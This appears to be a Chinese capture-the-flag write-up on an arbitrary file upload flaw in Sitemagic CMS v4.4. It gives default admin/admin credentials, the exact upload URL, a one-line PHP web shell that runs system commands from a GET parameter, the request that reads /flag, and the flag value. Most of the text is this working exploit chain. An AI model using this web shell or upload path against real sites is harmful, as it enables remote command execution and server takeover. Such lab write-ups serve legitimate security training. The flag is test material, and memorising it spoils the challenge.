一、题目

靶标介绍:
Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令。
进入题目:

admin/admin
/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages

一句话木马:
system.php
<?php system($_GET[1]);phpinfo();?>
/files/images/system.php?1=cat ///flag

flag{35a77803-ae47-4b5e-a937-d71f263c8a79}
文章揭示了SitemagicCMSv4.4中的安全漏洞,攻击者可通过SMFiles上传恶意代码并执行系统命令。提供了一行木马示例system.php,利用路径/files/images/system.php?1=cat///flag可获取flag。


被折叠的 条评论
为什么被折叠?



